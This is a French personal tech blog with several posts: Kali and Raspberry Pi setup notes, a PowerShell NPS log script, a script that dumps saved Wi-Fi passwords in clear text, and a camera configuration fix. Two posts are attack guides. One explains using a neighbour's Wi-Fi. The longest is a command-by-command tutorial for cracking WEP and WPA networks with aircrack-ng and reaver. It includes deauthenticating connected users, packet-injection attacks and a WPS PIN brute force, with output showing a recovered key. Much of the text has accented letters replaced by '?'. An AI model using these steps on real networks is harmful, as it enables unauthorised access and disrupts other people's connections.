Juil 082023
 

Résolution de l’écran de connection:

Éditer le fichier /etc/lightdm/lightdm.conf et ajouter la ligne suivante JUSTE APRÈS la section [Seat:*]

display-setup-script = xrandr —output XXXX —resolution 1920x1080

Drivers AWUS1900 pour Kali sous Raspberry Pi

git clone https://github.com/morrownr/8814au.git
cd 8814au
make
sudo make install
lsmod

Configurer Grub pour la carte HiDpi

grub-mkfont --output=/boot/grub/fonts/DejaVuSansMono32.pf2 --size=32 /usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf
echo -e "\nGRUB_FONT=/boot/grub/fonts/DejaVuSansMono32.pf2" | tee -a /etc/default/grub
update-grub
sed -i -e 's/^[[:space:]]*FONTFACE.*$/#\0\nFONTFACE="TER"/' /etc/default/console-setup
sed -i -e 's/^[[:space:]]*FONTSIZE.*$/#\0\nFONTSIZE="16x32"/' /etc/default/console-setup

Sep 062017
 

Avec ça, vous aurez les dernières erreurs et leurs causes possibles.

 

$NpsServers=('DC01','DC02')
$ReturnArray=@()

$NPS_Filter="<QueryList>
 <Query Id=`"0`" Path=`"System`">
 <Select Path=`"System`">*[System[Provider[@Name='NPS']]]</Select>
 <Select Path=`"System`">*[System[Provider[@Name='HRA']]]</Select>
 <Select Path=`"System`">*[System[Provider[@Name='Microsoft-Windows-HCAP']]]</Select>
 <Select Path=`"Security`">*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and Task = 12552]]</Select>
 </Query>
</QueryList>"

foreach ( $NpsServer in $NpsServers ) {
 foreach ( $Event in (Get-WinEvent -MaxEvents 800 -ComputerName $NpsServer -FilterXml ([xml]$NPS_Filter) | where {$_.message -like "*denied*"} ) ){
 $Message=$Event.Message.Split("`n")

$Retour = [PSCustomObject]@{
 TimeCreated =$Event.TimeCreated
 MachineName =$Event.MachineName
 AccountName =((($Message |Select-String -Pattern "Account Name" -CaseSensitive)[0]).ToString().split(':')[1]).trim()
 AuthType =((($Message |Select-String -Pattern "Authentication Type" -CaseSensitive)[0]).ToString().split(':')[1]).trim()
 Reason =''
 }
 if ($Message |Select-String -Pattern "Reason" ){
 $Retour.Reason =((($Message |Select-String -Pattern "Reason:" -CaseSensitive)[0]).ToString().split(':')[1]).trim()
 }

$ReturnArray+=$Retour
 }
}
$ReturnArray| ft -autosize

 

Juil 162017
 

A lancer en PowerShell

mkdir wifi
 cd wifi

netsh wlan export profile key=clear

$retour=@()

dir *.xml |% {
 $xml=[xml] (get-content $_)
 $tmp='' |select SSID,Password
 $tmp.SSID=$xml.WLANProfile.SSIDConfig.SSID.name
 $tmp.password=$xml.WLANProfile.MSM.Security.sharedKey.keymaterial
 $retour+=$tmp
 }

cd ..
 rmdir -recurse wifi

$retour | format-table -autosize
Et voilà…
Nov 302012
 

La connecter en WIFI

Juste une petite note sur cette cam?ra.

J’ai pass? une semaine ? tenter de la faire fonctionner en Wifi sans succ?s.

J’ai finalement trouv?! Mon wifi est sur le canal 13 (authoris? en Belgique)
Or, cette saloperie ne fonctionne PAS sur ces canaux!! normes fran?aises oblige!!!

Ce n’est indiqu? nulle part, et le support fait la sourde oreille.

Je suis pass? sur le canal 8, et ca fonctionne !!!

NB: Il n’est pas n?cessaire d’eteindre et rallumer la cam?ra comme indiqu?. Ca fonctionne direct.

 

Pour la faire fonctionner sur le Synology:

(source : http://syno.haeflinger.com/index.php/HEDEN_VisionCam_V2.2) Merci ? lui.

Editer le fichier? /volume1/@appstore/SurveillanceStation/conf/camera_model.conf

Ajouter?au d?but?de la section [camera*list] le texte suivant

Heden*VisionCam=Heden*generic
Heden*VisionCamv2=Heden*genericv2

Ajouter?? la fin de la section [camera*list]

[Heden*generic]
??????   port=80
 ??????? video source="videostream.cgi"
 ??????? tilt down="/decoder_control.cgi?command=0&onestep=1"
 ??????? tilt up="/decoder_control.cgi?command=2&onestep=1"
 ??????? pan right="/decoder_control.cgi?command=4&onestep=1"
 ??????? pan left="/decoder_control.cgi?command=6&onestep=1"
 ??????? home pos="/decoder_control.cgi?command=25" 
[Heden*genericv2]
 ??????? port=80
 ??????? video source="videostream.cgi"
 ??????? tilt down="/decoder_control.cgi?command=2&onestep=1"
 ??????? tilt up="/decoder_control.cgi?command=0&onestep=1"
 ??????? pan right="/decoder_control.cgi?command=6&onestep=1"
 ??????? pan left="/decoder_control.cgi?command=4&onestep=1"
 ??????? home pos="/decoder_control.cgi?command=25"

Ensuite, fermer la fen?tre Visual Station, stopper et red?marrer l’application, et re-ajouter une cam?ra. Tadaaa ca fonctionne.

Août 232012
 

Si vous venez d’avoir de gros soucis de connection ADSL, vous appr?cierez cette petite astuce.
Ce tutoriel fonctionne uniquement pour les reseaux WPA, pour du WEP ou OPEN, c’est plus facile, donc, pas expliqu? 🙂

pr?-requis:

  • Un Raspberry-Pi
  • Une cl? USB compatible linux
  • Avoir le package WPASUPPLICANT (apt-get install wpasupplicant)
  • Avoir un Raspberry-Pi ? jour (voir annexe1)

Se connecter au WIFI du voisin

Configurer le WIFI : /etc/wpa_supplicant.conf

network={
 ssid="bbox2-1234"
 psk="CeciEstUneCleWPAMaisNeRevezPasElleExistePas"
 }

Configurer les adresses IP + DHCP :: /etc/network/interfaces

 #loopback interface
 auto lo iface lo inet loopback

 #interface r?seau priv? (LAN) external network (internet), configured through dhcp
 auto eth0
 iface eth0 inet static
 address 192.168.10.1
 netmask 255.255.255.0
 network 192.168.10.0
 broadcast 192.168.10.255

# interface WIFI (DHCP)
 iface wlan2 inet dhcp

Connectez vous:

ifconfig wlan2 down
iwconfig wlan2 mode managed
wpa_supplicant -B -iwlan2 -c/etc/wpa_supplicant.conf -Dwext
ifconfig wlan2 up
dhclient wlan2

Activer le routage (2 fa?ons diff?rentes)

echo 1 > /proc/sys/net/ipv4/ip_forward

Ou

/etc/sysctl.conf --> net.ipv4.ip_forward=1 
sysctl -p

Configurer le natting

# delete old configuration, if any
#Flush all the rules in filter and nat tables
iptables --flush
iptables --table nat --flush

# delete all chains that are not in default filter and nat table, if any
iptables --delete-chain
iptables --table nat --delete-chain

# Set up IP FORWARDing and Masquerading (NAT)
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface eth1 -j ACCEPT

Testez si vous avez un acc?s internet, et comment vous l’avez:

ping www.google.com
traceroute www.google.be
route -n

Annexe 1 : Avoir un Raspberry-Pi ? jour

apt-get install ca-certificates
wget http://goo.gl/1BOfJ -O /usr/bin/rpi-update && chmod +x /usr/bin/rpi-update rpi-update
apt-get install git-core
rpi-update
ldconfig
rpi-update
Juil 212012
 

Cet article est purement perso.
Mais si il vous sert, alors tant mieux.

Diagnostique

pi@raspberrypi:~/sources$ lsusb 
Bus 001 Device 092: ID 1435:0427 Wistron NeWeb UR054g 802.11g Wireless Adapter [Intersil ISL3887] 
Bus 001 Device 003: ID 0424:ec00 Standard Microsystems Corp. 
Bus 001 Device 005: ID 03f0:0024 Hewlett-Packard KU-0316 Keyboard 
Bus 001 Device 002: ID 0424:9512 Standard Microsystems Corp. 
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub 
pi@raspberrypi:~/sources$ iwconfig 
lo        no wireless extensions.

eth0      no wireless extensions.

Solution

sudo mkdir /usr/local/lib/firmware 
sudo wget  -Utest -O /usr/local/lib/firmware/isl3887usb http://snakenet.eu/Binaries/2.13.25.0.lm87.arm
sudo wget  -Utest -O /usr/local/lib/firmware/isb3887usb2 http://snakenet.eu/Binaries/2.5.8.0.arm
sudo modprobe -r p54usb 
sudo modprobe p54usb

pi@raspberrypi:/usr/local/lib/firmware$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Tadaaaaa…

Bon… apr?s un petit moment, ca ne fonctionne plus, et le p?riph?rique disparait m?me de LSUSB, mais c’est parce que le Raspberry Pi ne d?livre pas assez d’amp?res ? la cl? USB. L’utilisation d’un HUB USB avec sa propre alimentation a r?solu le probl?me.

Merci a http://wiki.debian.org/prism54 et http://wireless.kernel.org/en/users/Drivers/p54 pour la source d’information !

Mar 242012
 

Vous essayez de passer votre carte WIFI en mode monitor , mais vous avez l’erreur suivante? :

SIOCSIFFLAGS : No such file or directory
ou
ioctl(SIOCGIFINDEX) failed: No such device

Solution : installez les firmwares de BackTrack sur votre syst?me.

Ajoutez le repository de backtrack :: /etc/apt/sources.list

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
apt-get update
apt-get install linux-firmware

Si ?a fonctionne toujours pas, essayez les drivers propri?taires…

apt-get install linux-firmware-nonfree

Et dans le doute… reboot 🙂

Fév 142012
 

Pr?-requis :

Avoir une distribution Debian ou Ubuntu. Ces distributions ne sont pas meilleures pour le crack que les autres, mais mon tutoriel est bas? uniquement sur cette distribution.
Les commandes fonctionnent parfaitement sur d?autres distributions. La seule diff?rence, est la mani?re d?installer les d?pendances.

Droits d?acc?s

Pour la grande majorit? des commandes, vous devez ?tre ROOT pour que cela fonctionne.

Vous pouvez le devenir en tapant la commande ? su ? ? et en entrant le mot de passe de ? root ?

Installer la suite aircrack-ng (et ses d?pendances)

apt-get install libssl-dev make gcc iw

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
make
make install

Avoir une carte wifi compatible (Realtek, RALink,…) Evitez les cartes Intel…

Tapez la commande ?iwconfig? et regardez le mat?riel Wifi install?.

root@linux-hack:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=27 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
pan0      no wireless extensions.

Dans ce cas-ci, on voit que l?interface r?seau WLAN0 est une carte WIFI.

Comment v?rifier si elle est capable de passer en mode ? monitor ?

root@linux-hack:~# airmon-ng start wlan0
 Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e

PID    Name
1211   NetworkManager
1220   avahi-daemon
1223   avahi-daemon
2298   wpa_supplicant
2300   dhclient

Interface      Chipset        Driver
wlan0          RTL8187        rtl8187 - [phy0]
                              (monitor mode enabled on mon0)

Nous voyons que la carte WLAN0 est pass?e en mode monitor via la nouvelle interface r?seau ? MON0 ?

Scannez les r?seaux Wifi environnants pour trouver votre cible

airodump-ng mon0

Cette commande va vous donner la liste de tout ce qu?il trouve

CH  5 ][ Elapsed: 24 s ][ 2012-02-14 09:32

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 11:22:33:44:55:66  -36       39       30    0   9  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -35       41        0    0   9  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -49       19        1    0   1  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -66       14        0    0   6  54e  WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -65       15        1    0   6  54e. WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -67        7        0    0   1  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -67       19        0    0   9  54 . WEP  WEP         bbox2-1234
 11:22:33:44:55:66  -68        5        1    0   1  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -70        4        0    0   1  54e  WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -71        4        0    0  11  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -72        2        0    0   1  54e. WEP  WEP         bbox2-1234

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   11:22:33:44:55:66  -72    0 - 1      0        2  bbox2-9999
 11:22:33:44:55:66  11:22:33:44:55:66   -9   54e-54      0        4
 11:22:33:44:55:66  11:22:33:44:55:66  -56    1e- 5      0        2

BSSID = adresse MAC de l’appareil
ESSID = nom d WIFI
STATION = Adresse MAC d’un appareil wifi connect? (pc, GSM, …)
PWR = perte de signal entre vous et la station (-40 = bien. -70 = mauvais signal)
CH = canal de communication (fr?quence)
ENC = Cryptage mis en place.

J?ai volontairement masqu? les adresses MAC et les noms des WIFI pour des raisons de s?curit?

Cracker le mot de passe d?un r?seau Wifi

Cracker un reseau OPN

Y’a pas besoin, il n’y a aucun cryptage

Cracker un r?seau WEP

Dans la suite, je vous pr?senterai plusieurs commandes. Celles-ci sont a lancer en simultan?. Ouvrez donc une fen?tre de terminal diff?rente ? chaque attaque/commande

1? Lancer airodump en mode « enregistrement des donn?es » sur la cible.

Voici les d?tails de ma cible :

BSSID                PWR  Beacons  #Data, #/s  CH    MB     ENC    CIPHER    AUTH ESSID
 11:22:33:44:55:66    -68  5        0      0    1     54e.   WEP    WEP            bbox2-1234
airodump-ng -w BIBOX --ivs -c 1 -d 11:22:33:44:55:66 mon0

Cette commande demande :

– D’?crire dans un fichier commen?ant par BIBOX
– N’?crire que les donn?es utiles pour le crack (les IVS)
– De se caler sur le canal 1 (-c 1)
– De ne filtrer que sur l’Access Point qui nous int?resse sur base de son adresse MAC (-d MAC )
– Le tout, via l’interface r?seau « mon0 »

Cette commande ne devra ?tre arr?t?e QUE quand on aura finalement crack? l’AccessPoint.

2? Ejecter tous les gens connect?s dessus afin de les forcer ? se reconnecter.

aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0

-0 0 : attaque 0 ex?cut?e ind?finiment (0)
-a MAC : adresse mac de la machine que j’attaque

Arr?ter la commande apr?s un certain temps. Vous pourrez la relancer plusieurs fois si vous voulez, mais n?oubliez pas de vous r?-authentifier apr?s (point suivant)

3? S’authentifier sur le WIFI (faire croire qu’on est copains)

aireplay-ng -1 0 -e 11:22:33:44:55:66 mon0

-1 0 : attaque 1 ex?cut?e sans arr?t (0)
-e MAC : adresse mac de la machine que j’attaque

4? Faire une attaque ? ARP ?

aireplay-ng -3  -e 11:22:33:44:55:66 mon0

Cette attaque est TRES ?fficace quand quelqu?un est d?j? connect? sur le wifi.
Il vaut mieux la laisser tourner. D?s qu?elle d?marre, elle est redoutable !

5? Faire une attaque ? chop-chop ?

aireplay-ng -4  -e 11:22:33:44:55:66 mon0

6? Faire une attaque ? cofee-latte ?

aireplay-ng -6  -e 11:22:33:44:55:66 mon0

Cette attaque est efficace si quelqu?un est d?j? connect? sur le WIFI

7? cracker la clef.

C?est bien beau de sauver les IVS, de faire des attaques, de g?n?rer du traffic et tout et tout, mais on voulait quoi d?j? ? Ah oui ! cette foutue clef !

aircrack-ng *.ivs

Laissez tourner?

D?s que la clef sera trouv?e, vous pourrez arr?ter toutes les attaques ci-dessus.

Cracker du WPA

Pr?-requis :

Installer les programmes n?cessaires ainsi que leurs d?pendances

apt-get install libsqlite3-dev libpcap0.8-dev

 wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
 tar -zxf reaver-1.4.tar.gz
 cd reaver-1.4
 cd src
 ./configure
 make
 make install

Connaitre sa cible.

Voir point ci-dessus : Scannez les r?seaux Wifi environnants pour trouver votre cible

Attaquer le point WIFI

reaver -i mon0 -b 11:22:33:44:55:66

ou, si ca ne fonctionne pas (comme chez moi)

reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66

La syntaxe est simple : lancer reaver sur l?interface wifi qui-va-bien avec comme param?tre l?adresse MAC du wifi cible (BSSID) (vous pouvez ajouter l?option ? ?vv ? pour le voir travailler)

Le r?sultat apparait comme par enchantement !

root@linux-hack:~# reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

[+] Waiting for beacon from 11:22:33:44:55:66[+] Switching mon0 to channel 1
[+] Associated with 11:22:33:44:55:66 (ESSID: bbox2-1234)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 12 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'Ceciestuntutoriel'
[+] AP SSID: 'bbox2-1234'
[+] Nothing done, nothing to save.
root@linux-hack:~#

Et voil?. 12 secondes pour du WPA. Le mot de passe apparait : ‘Ceciestuntutoriel’

Si vous voulez connaitre le vendeur d’une carte r?seau : http://www.base64online.com/mac_address.php

 

Déc 302011
 

Je ne parlerai pas ici de l’interface graphique de chaque distribution, il y en a de trop.

Non, je vous parlerai d’une m?thode qui fonctionne toujours : la ligne de commande..

Pr?-requis:

  1. Connaitre le nom de son interface wifi
    iwconfig
  2. Connaitre la liste des points wifi environnants
    iwlist [interface] scan

Mode op?ratoire:

  1. D?sactiver la carte pour la configurer
    ifconfig [interface] down
  2. Lui dire sur quel r?seau se connecter
    iwconfig [interface] essid [nom du wifi]